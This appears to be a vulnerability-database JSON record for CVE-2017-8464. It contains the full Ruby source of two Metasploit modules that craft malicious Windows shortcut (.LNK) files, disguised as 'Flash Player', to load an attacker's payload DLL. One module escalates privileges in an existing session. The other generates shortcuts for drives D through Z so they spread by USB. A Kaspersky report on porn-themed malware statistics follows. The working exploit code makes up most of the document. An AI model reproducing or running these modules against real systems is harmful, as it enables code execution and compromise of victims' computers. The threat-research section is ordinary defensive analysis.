"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2023-01-02T12:00:09", "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. 
The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. The PATH option must be an absolute path to a writeable directory which is indexed for searching. If no PATH is specified, the module defaults to %USERPROFILE%.\n", "cvss3": {}, "published": "2017-10-05T14:16:31", "type": "metasploit", "title": "LNK Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0096", "CVE-2017-8464"], "modified": "2021-10-06T12:54:51", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2017_8464_LNK_LPE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2017_8464_lnk_lpe/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n\n attr_accessor :exploit_dll_name\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'LNK Code Execution Vulnerability',\n 'Description' => %q{\n This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). 
The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n The PATH option must be an absolute path to a writeable directory which is indexed for\n searching. If no PATH is specified, the module defaults to %USERPROFILE%.\n },\n 'Author' => [\n 'Uncredited', # vulnerability discovery\n 'Yorick Koster', # msf module\n 'Spencer McIntyre' # msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2017-8464'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],\n ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup\n ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format\n ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'],\n ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf']\n ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'process',\n 'FileDropperDelay' => 15,\n 'WfsDelay' => 30\n },\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Payload' => {\n 'Space' => 2048\n },\n 'Platform' => 'win',\n 'Targets' => [\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ],\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ]\n ],\n 'DefaultTarget' => 0, # Default target is Automatic\n 'DisclosureDate' => '2017-06-13',\n 'Notes' => {\n 'Stability' => [ CRASH_SERVICE_RESTARTS, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, ],\n },\n 'Compat' => {\n 'Meterpreter' => {\n 'Commands' => %w[\n stdapi_sys_config_getenv\n ]\n }\n },\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', [false, 'The LNK file']),\n OptString.new('DLLNAME', [false, 'The DLL file containing the payload']),\n OptString.new('PATH', [false, 'An explicit path to where 
the files should be written to'])\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),\n OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])\n ]\n )\n end\n\n def check\n if session.sys.process['SearchIndexer.exe']\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n def get_name(option, default_ext)\n name = datastore[option].to_s.strip\n name = \"#{rand_text_alpha(16)}.#{default_ext}\" if name.blank?\n name\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if session.platform != 'windows'\n fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')\n end\n\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')\n arch = target['Arch'] == ARCH_ANY ? 
payload.arch.first : target['Arch']\n datastore['EXE::Path'] = path\n datastore['EXE::Template'] = ::File.join(path, \"template_#{arch}_windows.dll\")\n\n path = datastore['PATH'] || session.sys.config.getenv('USERPROFILE')\n path.chomp!(\"\\\\\")\n\n dll_path = \"#{path}\\\\#{get_name('DLLNAME', 'dll')}\"\n write_file(dll_path, generate_payload_dll)\n\n lnk_path = \"#{path}\\\\#{get_name('FILENAME', 'lnk')}\"\n write_file(lnk_path, generate_link(dll_path))\n register_files_for_cleanup(dll_path, lnk_path)\n end\n\n def file_rm(file)\n if file_dropper_delete(session, file) && @dropped_files && file_dropper_deleted?(session, file, true)\n @dropped_files.delete(file)\n end\n end\n\n def generate_link(path)\n vprint_status(\"Generating LNK file to load: #{path}\")\n path += \"\\x00\" # Do not use << here\n display_name = datastore['LnkDisplayName'].dup << \"\\x00\" # LNK Display Name\n comment = datastore['LnkComment'].dup << \"\\x00\"\n\n # Control Panel Applet ItemID with our DLL\n cpl_applet = [\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00\n ].pack('C*')\n cpl_applet << [path.length].pack('v')\n cpl_applet << [display_name.length].pack('v')\n cpl_applet << path.unpack('C*').pack('v*')\n cpl_applet << display_name.unpack('C*').pack('v*')\n cpl_applet << comment.unpack('C*').pack('v*')\n\n # LinkHeader\n ret = [\n 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C\n 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046\n 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)\n 0x00, 0x00, 0x00, 0x00, # FileAttributes\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime\n 0x00, 0x00, 0x00, 0x00, # FileSize\n 0x00, 0x00, 0x00, 0x00, # IconIndex\n 0x00, 
0x00, 0x00, 0x00, # ShowCommand\n 0x00, 0x00, # HotKey\n 0x00, 0x00, # Reserved1\n 0x00, 0x00, 0x00, 0x00, # Reserved2\n 0x00, 0x00, 0x00, 0x00 # Reserved3\n ].pack('C*')\n\n # IDList\n idlist_data = ''\n # ItemID = ItemIDSize (2 bytes) + Data (variable)\n idlist_data << [0x12 + 2].pack('v')\n idlist_data << [\n # All Control Panel Items\n 0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n # ItemID = ItemIDSize (2 bytes) + Data (variable)\n idlist_data << [cpl_applet.length + 2].pack('v')\n idlist_data << cpl_applet\n idlist_data << [0x00].pack('v') # TerminalID\n\n # LinkTargetIDList\n ret << [idlist_data.length].pack('v') # IDListSize\n ret << idlist_data\n\n # ExtraData\n # SpecialFolderDataBlock\n ret << [\n 0x10, 0x00, 0x00, 0x00, # BlockSize\n 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005\n 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel)\n 0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList\n ].pack('C*')\n # TerminalBlock\n ret << [0x00, 0x00, 0x00, 0x00].pack('V')\n ret\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-02T12:00:12", "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. 
If no PATH is specified, the module will use drive letters D through Z so the files may be placed in the root path of a drive such as a shared VM folder or USB drive.\n", "cvss3": {}, "published": "2017-08-02T20:46:30", "type": "metasploit", "title": "LNK Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0096", "CVE-2017-8464"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT-WINDOWS-FILEFORMAT-CVE_2017_8464_LNK_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n\n attr_accessor :exploit_dll_name\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'LNK Code Execution Vulnerability',\n 'Description' => %q{\n This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. 
This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n If no PATH is specified, the module will use drive letters D through Z so the files\n may be placed in the root path of a drive such as a shared VM folder or USB drive.\n },\n 'Author' =>\n [\n 'Uncredited', # vulnerability discovery\n 'Yorick Koster', # msf module\n 'Spencer McIntyre' # msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2017-8464'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],\n ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup\n ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format\n ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'],\n ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'DisablePayloadHandler' => true\n },\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Payload' =>\n {\n 'Space' => 2048\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', { 'Arch' => ARCH_ANY } ],\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ],\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ]\n ],\n 'DefaultTarget' => 0, # Default target is Automatic\n 'DisclosureDate' => '2017-06-13',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SERVICE_RESTARTS, ],\n },\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']),\n OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']),\n OptString.new('PATH', [false, 'An explicit path to where the files will be hosted'])\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),\n OptString.new('LnkDisplayName', [true, 'The display name to use in the 
generated LNK file', 'Flash Player'])\n ]\n )\n end\n\n def exploit\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')\n arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']\n datastore['EXE::Path'] = path\n datastore['EXE::Template'] = ::File.join(path, \"template_#{arch}_windows.dll\")\n\n dll = generate_payload_dll\n dll_name = datastore['DLLNAME'] || \"#{rand_text_alpha(16)}.dll\"\n dll_path = store_file(dll, dll_name)\n print_status(\"#{dll_path} created, copy it to the root folder of the target USB drive\")\n\n if datastore['PATH']\n lnk = generate_link(\"#{datastore['PATH'].chomp(\"\\\\\")}\\\\#{dll_name}\")\n lnk_filename = datastore['FILENAME'] || \"#{rand_text_alpha(16)}.lnk\"\n lnk_path = store_file(lnk, lnk_filename)\n print_status(\"#{lnk_path} created, copy to the target paths\")\n\n else\n # HACK: Create LNK files to different drives instead\n # Copying all the LNK files will likely trigger this vulnerability\n ('D'..'Z').each do |i|\n fname, ext = (datastore['FILENAME'] || \"#{rand_text_alpha(16)}.lnk\").split('.')\n ext = 'lnk' if ext.nil?\n lnk_filename = \"#{fname}_#{i}.#{ext}\"\n lnk = generate_link(\"#{i}:\\\\#{dll_name}\")\n lnk_path = store_file(lnk, lnk_filename)\n print_status(\"#{lnk_path} created, copy to the target USB drive\")\n end\n end\n end\n\n def generate_link(path)\n vprint_status(\"Generating LNK file to load: #{path}\")\n path << \"\\x00\"\n display_name = datastore['LnkDisplayName'].dup << \"\\x00\" # LNK Display Name\n comment = datastore['LnkComment'].dup << \"\\x00\"\n\n # Control Panel Applet ItemID with our DLL\n cpl_applet = [\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00\n ].pack('C*')\n cpl_applet << [path.length].pack('v')\n cpl_applet << [display_name.length].pack('v')\n cpl_applet << path.unpack('C*').pack('v*')\n cpl_applet << display_name.unpack('C*').pack('v*')\n cpl_applet << 
comment.unpack('C*').pack('v*')\n\n # LinkHeader\n ret = [\n 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C\n 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046\n 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)\n 0x00, 0x00, 0x00, 0x00, # FileAttributes\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime\n 0x00, 0x00, 0x00, 0x00, # FileSize\n 0x00, 0x00, 0x00, 0x00, # IconIndex\n 0x00, 0x00, 0x00, 0x00, # ShowCommand\n 0x00, 0x00, # HotKey\n 0x00, 0x00, # Reserved1\n 0x00, 0x00, 0x00, 0x00, # Reserved2\n 0x00, 0x00, 0x00, 0x00 # Reserved3\n ].pack('C*')\n\n # IDList\n idlist_data = ''\n # ItemID = ItemIDSize (2 bytes) + Data (variable)\n idlist_data << [0x12 + 2].pack('v')\n idlist_data << [\n # All Control Panel Items\n 0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n # ItemID = ItemIDSize (2 bytes) + Data (variable)\n idlist_data << [cpl_applet.length + 2].pack('v')\n idlist_data << cpl_applet\n idlist_data << [0x00].pack('v') # TerminalID\n\n # LinkTargetIDList\n ret << [idlist_data.length].pack('v') # IDListSize\n ret << idlist_data\n\n # ExtraData\n # SpecialFolderDataBlock\n ret << [\n 0x10, 0x00, 0x00, 0x00, # BlockSize\n 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005\n 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel)\n 0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList\n ].pack('C*')\n # TerminalBlock\n ret << [0x00, 0x00, 0x00, 0x00].pack('V')\n ret\n end\n\n # Store the file in the MSF local directory (eg, /root/.msf4/local/)\n def store_file(data, filename)\n @ltype = \"exploit.fileformat.#{@shortname}\"\n\n if !::File.directory?(Msf::Config.local_directory)\n 
FileUtils.mkdir_p(Msf::Config.local_directory)\n end\n\n if filename && !filename.empty?\n fname, ext = filename.split('.')\n else\n fname = \"local_#{Time.now.utc.to_i}\"\n end\n\n fname = ::File.split(fname).last\n\n fname.gsub!(/[^a-z0-9\\.\\_\\-]+/i, '')\n fname << \".#{ext}\"\n\n path = File.join(\"#{Msf::Config.local_directory}/\", fname)\n full_path = ::File.expand_path(path)\n File.open(full_path, \"wb\") { |fd| fd.write(data) }\n\n full_path.dup\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2019-03-13T12:52:04", "description": "\n\n[ **More graphs and statistics in full PDF version**](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/13112943/Threats_to_users_of_adult_websites_2018.pdf>)\n\n## Introduction\n\n2018 was a year that saw campaigns to decrease online pornographic content and traffic. For example, one of the most adult-content friendly platforms \u2013 Tumblr \u2013 announced it was [banning erotic content ](<https://www.theverge.com/2018/12/5/18126451/tumblr-porn-social-media-ban>) (even though [almost a quarter](<https://motherboard.vice.com/en_us/article/4xa8v3/so-how-much-porn-is-on-tumblr>) of its users consume adult content). In addition, the UK received the title of '[The Second Most Porn-Hungry Country in the World](<http://www.gizmodo.co.uk/2018/12/the-uk-is-still-the-second-most-porn-hungry-country-in-the-world-according-to-pornhub/>)' and is now [implementing a law on age-verification for pornography lovers](<https://uk.news.yahoo.com/porn-sites-will-require-proof-age-april-next-year-123901041.html>) that will prohibit anyone below the age of 18 to watch this sort of content. 
This is potentially [opening a world of new tricks](<https://news.sky.com/story/academics-doubt-value-of-online-porn-age-checks-10952614>) for scammers and threat actors to take advantage of users. In addition, even commercial giant Starbucks [declared a 'holy war' on porn](<https://www.nbcnews.com/news/us-news/starbucks-says-it-will-start-blocking-pornography-its-stores-wi-n941646>) as it was revealed that many visitors prefer to have their coffee while consuming adult content, rather than listening to music or reading the latest headlines on news websites.\n\nSuch measures might well be valid, at least from a cybersecurity perspective, as the following example suggests. According to news reports last year, an extremely active [adult website user](<https://www.oversight.gov/sites/default/files/oig-reports/ManagementAdvisory%20_USGSITSecurityVulnerabilities_101718_0.pdf>), who turned out to be a government employee, dramatically failed to keep his hobby outside of the workplace. By accessing more than 9,000 web pages with adult content, he compromised his device and subsequently infected the entire network with malware, leaving it vulnerable to spyware attacks. This and other examples confirm that adult content remains a controversial topic from both a social and a cybersecurity standpoint.\n\nIt is no secret that digital pornography has long been associated with malware and cyberthreats. While [some](<https://www.kaspersky.com/blog/porno-danger-fact-or-fiction/21865/>) of these stories are now shown to be myths, others are very legitimate. A year ago, we conducted [research](<https://www.kaspersky.com/blog/porn-themed-threats-report/20891/>) on the malware hidden in pornography and found out that such threats are both real and effective. 
One of the key takeaways of last year's report was the fact that cybercriminals not only use adult content in multiple ways \u2013 from lucrative decoys to make victims install malicious applications on their devices, to topical fraud schemes used to steal victims' banking credentials and other personal information \u2013 but they also make money by stealing access to pornographic websites and reselling it at a cheaper price than the cost of a direct subscription.\n\nLast year, we discovered a number of malicious samples that were specifically hunting for credentials to access some of the most popular pornographic websites. When we considered why someone would hunt for credentials to pornographic websites, we checked the underground markets (both on the dark web and on open parts of the internet) and found that credentials to pornography website accounts are themselves quite a valuable commodity to be sold online. They are for sale in their thousands.\n\nIt would be going too far to say that the findings from our previous exploration of the relationships between cyberthreats and adult content were unexpected. At the end of the day, pornography has always been, and remains, one of the most sought-after types of online content. At the same time, cybercriminals have always looked to increase their profits with the most efficient and cheapest way of delivering malicious payloads to victims. It was almost inevitable that adult content would become an important tool for them.\n\nThat said, our monitoring of the wider cyberthreat landscape shows that threat actors tend to change their habits, tactics and techniques over time. This means that even in a niche area, such as pornographic content and websites, changes are possible. That is why this year we decided to repeat our exercise and investigate the topic once again. 
As it turned out, some things have indeed changed.\n\n## Methodology and key findings\n\nTo measure the level of risk that may be associated with adult content online, we investigated several different indicators. We examined malware disguised as pornographic content, and malware that hunts for credentials to access pornography websites. We looked at the threats that are attacking users across the internet in order to find out which popular websites might be dangerous to visit. Additionally, we checked our phishing and spam database to see if there is a lot of pornographic content on file and how it is used in the wild. Using aggregated threat statistics obtained from the Kaspersky Security Network \u2013 the infrastructure dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world \u2013 we measured how often and how many users of our products have encountered adult-content themed threats.\n\nAdditionally, we checked around twenty underground online markets and counted how many accounts are up for sale, which are the most popular, and the price they are sold for.\n\nAs a result, we discovered the following:\n\n * **Searching for pornography online has become safer:** in 2018, there were **650,000 attacks** launched from online resources. That is **36% less** than in 2017, when more than a million of these attacks were detected.\n * **Cybercriminals are actively using popular porn-tags to promote malware in search results.** The 20 most popular make up 80% of all malware disguised as porn. Overall, 87,227 unique users downloaded porn-disguised malware in 2018, with 8% of them using a corporate rather than personal network to do this.\n * **In 2018, the number of attacks using malware to hunt for credentials that grant access to pornography websites grew almost three-fold compared to 2017,** with more than 850,000 attempts to install such malware. 
The number of users attacked doubled, with 110,000 attacked PCs across the world.\n * The number of **unique sales offers of credentials for premium accounts to adult content websites almost doubled** to more than **10,000**.\n * **Porn-themed threats increased in terms of the number of samples, but declined in terms of variety:** In 2018, Kaspersky Lab identified at least **642 families of PC threats** disguised under one common pornography tag. In terms of their malicious function, these families were distributed between **57 types** (76 last year). In most cases they are **Trojan-Downloaders, Trojans and AdWare.**\n * **89%** of infected files disguised as pornography on Android devices turned out to be **AdWare**.\n * In Q4 2018, there were 10 times as many attacks coming from phishing websites pretending to be popular adult content resources, compared to Q4 2017 when the overall figure reached **21,902 attacks**.\n\n## Part 1 - Malware\n\nAs mentioned above, cybercriminals put a lot of effort into delivering malware to user devices, and pornography serves as a great vehicle for this. Most malware that reaches users' computers from malicious websites is disguised as videos. Users who do not check the file extension and go on to download and open it are sent to a webpage that extorts money: the video is played online or for free only after the user agrees to install a malicious file disguised as a software update or something similar. However, in order to download anything from this kind of website, the user first has to find the website. That is why the most common first-stage infection scenarios for both PC and mobile porn-disguised malware involve the manipulation of search query results.\n\nTo do this, cybercriminals first identify which search requests are the most popular among users looking for pornography. They then implement so-called 'black SEO' techniques. 
This involves changing the malicious website content and description so it appears higher up on the search results pages. Such websites can be found in third or fourth place in the list of search results.\n\nAccording to our findings, this method is still actively used but its efficiency is falling. To check this, we took 100 of the top listed pornographic websites (as suggested by search engines after entering a query for the word 'porn'), plus those that have the word 'porn' in the title, and checked whether any of them posed a threat to users. It turned out that in 2017 our products stopped more than a million users from attempting to install malware from websites on the list. However, in 2018, the number of users affected decreased to 658,930. This could be the result of search engines putting processes in place to fight against 'black SEO' activities and protecting users from malicious content.\n\n### Porn tags = Malware tags\n\nOptimizing malicious websites so as to ensure that those wanting to view adult content will find them is not the only tool criminals explore in order to find the best ways of delivering infected files to victims' devices. It turned out during our research that cybercriminals are disguising malware or not-a-virus files as video files and naming them using popular porn tags. A 'porn tag' is a special term that is used to easily identify content from a specific pornographic video genre. Tags are used by pornography websites to organize their video libraries and help users to quickly and conveniently find the video they are interested in. The not-a-virus type of threats is represented here by RiskTools, Downloaders and AdWare. None of these types is typically classified as malware, yet such applications may do something unwanted to users. 
AdWare, for instance, can show users unsolicited advertising, alter search results and collect user data to show targeted, contextual advertising.\n\nTo check how widespread this trend is, we took the most popular classifications and tags of adult videos from three major legal websites distributing adult content. The groupings were chosen by the overall number of videos uploaded in each category on the websites. As a result, we came up with a list of around 100 tags, which between them may well cover every possible type of pornography in existence. Subsequently, we ran those tags against our database of threats and through the Kaspersky Security Network databases and figured out which of them were used in malicious attacks and how often.\n\nThe overall number of users attacked with malware and not-a-virus threats disguised as porn-themed files dropped by about half compared to 2017. While back then their total number was 168,702, the situation in 2018 was a little more positive: down to 87,227, with 8% of them downloading porn-disguised malware from corporate networks. In this sense, scammers are merely following the overall trend: according to Pornhub's statistics, the share of pornography viewed on desktops has dropped by 18%. However, we were not able to get full confirmation that the 2018 decrease in the number of users attacked with malicious pornography relates to changes in consumer habits.\n\nPerhaps one of the most interesting takeaways we got from the analysis of how malware and not-a-virus are distributed among porn tags, is that although we were able to identify as many as 100 of them, most of the attacked users (around 80%, both in 2017 and 2018) encountered threats that mention only 20 of them. The tags used most often match the most popular tags on legitimate websites. 
Although we couldn't find perfect correlations between the top watched types of adult video on legitimate websites and the most often encountered porn-themed threats, the match between malicious pornography and safe pornography means that malware and not-a-virus authors follow trends set by the pornography-viewing community.\n\nMoving forward, the overall picture surrounding porn-disguised threat types showed more changes in 2018 when compared to 2017. In 2018, we saw 57 variations of threats disguised as famous porn tags, from 642 families. For comparison, the figures in 2017 were 76 and 581 respectively. That means that while the number of samples of porn-malware is growing, the number of types of malware and not-a-virus that are being distributed through pornography is decreasing.\n\nThe top three most popular classes of threats turned out to be Trojan-Downloader, with 45% of files, Trojan with 20% and AdWare, which is not a virus, with 9%, while in 2017 the top three were different: Trojan-Downloader was still there with 29%, exploits took the second place with 23% and Trojans accounted for around 19%.\n\nThreat type (2017) | Share of attacked users (2017) | Threat type (2018) | Share of attacked users (2018) \n---|---|---|--- \nTrojan-Downloader | 29% | Trojan-Downloader | 45% \nExploit | 23% | Trojan | 20% \nTrojan | 19% | AdWare (not a virus) | 9% \nAdWare (not a virus) | 11% | Worm | 8% \nWorm | 6% | Virus | 2% \nVirus | 2% | Downloader (not a virus) | 2% \nRiskTool (not a virus) | 2% | Exploit | 2% \nDownloader (not a virus) | 2% | Trojan-Dropper | 2% \nTrojan-Dropper | 1% | UDS: DangerousObject | 2% \nOther | 5% | Other | 8% \n \n_Top-10 types of threat that went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network_\n\n_Top-10 verdicts which went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. 
Source: Kaspersky Security Network_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20151847/threats-to-users-of-adult-websites-in-2018-2.png>)

The most noticeable change in the overall picture is the large number of exploits in 2017: back then they accounted for almost a quarter of all infected files, while in 2018 they were not represented in the top 10. There is an explanation for the popularity of such threats. In 2017, exploits were represented by massive detections of Exploit.Win32.CVE-2010-2568.gen, a generic detection (a detection that describes multiple similar malware pieces) for files that exploited the vulnerability in the Windows Shell named [CVE-2010-2568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>). However, the same detection name applies for another vulnerability in LNK, [CVE-2017-8464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>). This vulnerability, and the publicly available exploit for it, became public in 2017 and immediately raised a lot of interest amongst threat actors – thereby raising the bar in exploit detections. Within a year, the attacks on CVE-2017-8464 reduced significantly as most users patched their computers and malware writers went back to using classical malware aimed at more common file formats (such as JS, VBS, PE).

